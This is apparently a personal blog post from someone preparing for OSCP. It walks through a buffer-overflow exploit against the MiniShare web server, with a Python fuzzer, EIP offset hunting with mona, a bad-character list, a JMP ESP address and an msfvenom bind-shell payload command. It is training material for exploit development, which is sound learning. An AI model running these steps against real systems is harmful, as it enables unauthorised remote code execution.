MiniShare BoF: ExDev P.1

Posted on by n0ps

BoF: OSCP Preperation

I am currently 2/3rds of the way through my OSCP labs. I have started going back through all the buffer overflow examples I have found that will help me attack the 25 point machine on the test. Currently I have worked through the FreeFloat, SyncBreeze, and VulnServer to help me along my journey. So I wanted to start documenting my BOF training on my blog. Both as a resource for others and a documentation for myself.

I started PenTesting in 09/10′ during college. I dedicated one of my one of my 3 month internships by going through the c0relan.be tutorials. Mostly on my own server at the school and on my dedicated VM WinXP machine at the time. These tutorials are a great resource though somewhat outdated they lay out the basics of exploit development and I highly encourage anyone interested in exDev to use them as an educational tool.

Fuzzing MiniShare

We first need to create our basic fuzzing program to help crash the Minishare Server and locate the offset of EIP.

#!/usr/share/python

import socket,sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="A"*200
buff+=" HTTP/1.1\r\n\r\n"
s.send(buff)
s.close()

I like to use the sys.argv value to help recreate the program at another point and input my own values. It gives me a bit more control and flexibility with the exDev process. You can slowly increment the amount of A’s pushed onto the server until it crashes. Once we have found the necessary amount of A’s to crash the program we can begin to control the EIP register.

Controlling EIP

Once we have been able to successfully crash the program we now need to control the EIP register and begin to build out our exploit a bit more. Using pattern create we can generate a series of chars that will help us understand the offset of the EIP register. We want to use the same amount of chars that initially crash the program.

msf-pattern_create -l 2000

Copy paste the pattern info into the proof of concept fuzzing program. I also create a new version of my exploits to better reference the evolution of the exploit at a later date.

We will then run the program, attach it to Immunity, and crash the application again using our new string of 2000 chars.

Once the program has crashed with our generated pattern go to the search bar and use !mona in Immunity and run the command:

!mona findmsp

We will then be able to locate the EIP offset and it will give us a unique dump of other potential registers of interest.

Our EIP register is offset at 1787 characters. So we now can gain control over EIP and can insert our 4 hexidecimal B’s to verify this control.

Below is our new exploit:

We will now use this simple exploit to see if we can gain control over EIP to then begin building out a place to put our shellcode. Open up the program again and attach Immunity. Be sure to press the play button to get the program out of the paused mode and running.

Run your exploit and you should crash the program and hit a breakpoint in the program. Be sure your 4 B’s are overwriting EIP like below.

Finding Bad Characters

Once we have gained control of EIP we will want to begin looking for any bad characters while creating our shellcode. So we will generate all hexidecimal characters from x01 to xff. Like below:

"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

Placing this into our skeleton exploit after the A’s. Run the program again and attach Immunity. Run the exploit again observe the crash and Follow the Dump of ESP to locate any bad characters.

To start off we have xOD as our first bad character. We will take out xOD and run the exploit again. And observe any other bad char in the shellcode.

Be sure to make a comment in your skeleton code for future reference. This is just a good practice overall so if you continue with exDev it will be easier for other to read your code in the future.

Run the program again. attach Immunity, and run your skeleton exploit.

We can see that we do not get any other bad characters. So now we will need to find a register to jump to so we can run our shellcode. Below is our set of bad characters:

Finding JMP ESP & Generating Shellcode

When we crash MiniShare we want the contents of ESP to be executed by EIP. ESP will be the beginning of our shellcode that will want to execute to gain access to the Windows 7 machine. This can be done by executing a JMP ESP instruction. We will the program and Immunity using !mona to find our JMP ESP address.

We will go to our right click drop down module:

search > all modules

JMP ESP

We will use the USER32.ddl address of JMP ESP:

764b4e5b

Then we will generate our payload using msfvenom

msfvenom -p windows/shell_bind_tcp -a x86 -b '\x00\x0d' -f c

Take your generated shellcode and place it into your working exploit after the nops.

A note on nops

NOPS:
No operations are an important part of shellcode, imagine trying to point to a single address, that holds our shellcode,
when the possibility of pointing to the correct address is slim, Nops make it easier, because they do nothing, they just
go down until the next instruction, so imagine your shellcode in the environment, and we point to the wrong address
which just so happens to have our NOPS:
​
0xbffffca8: NOP
0xbffffcac: NOP
0xbffffcb2: SHELLCODE

https://www.exploit-db.com/papers/13147

Exploit!

Run your exploit and then open up netcat and connect to the victim.

If you crafted your shellcode correctly you should have a connection to the victim machine from your attacking machine.

A quick link to my buffer overflows:
https://github.com/n0psn0ps/OSCP_bof_Prep

Leave a Reply

Your email address will not be published. Required fields are marked *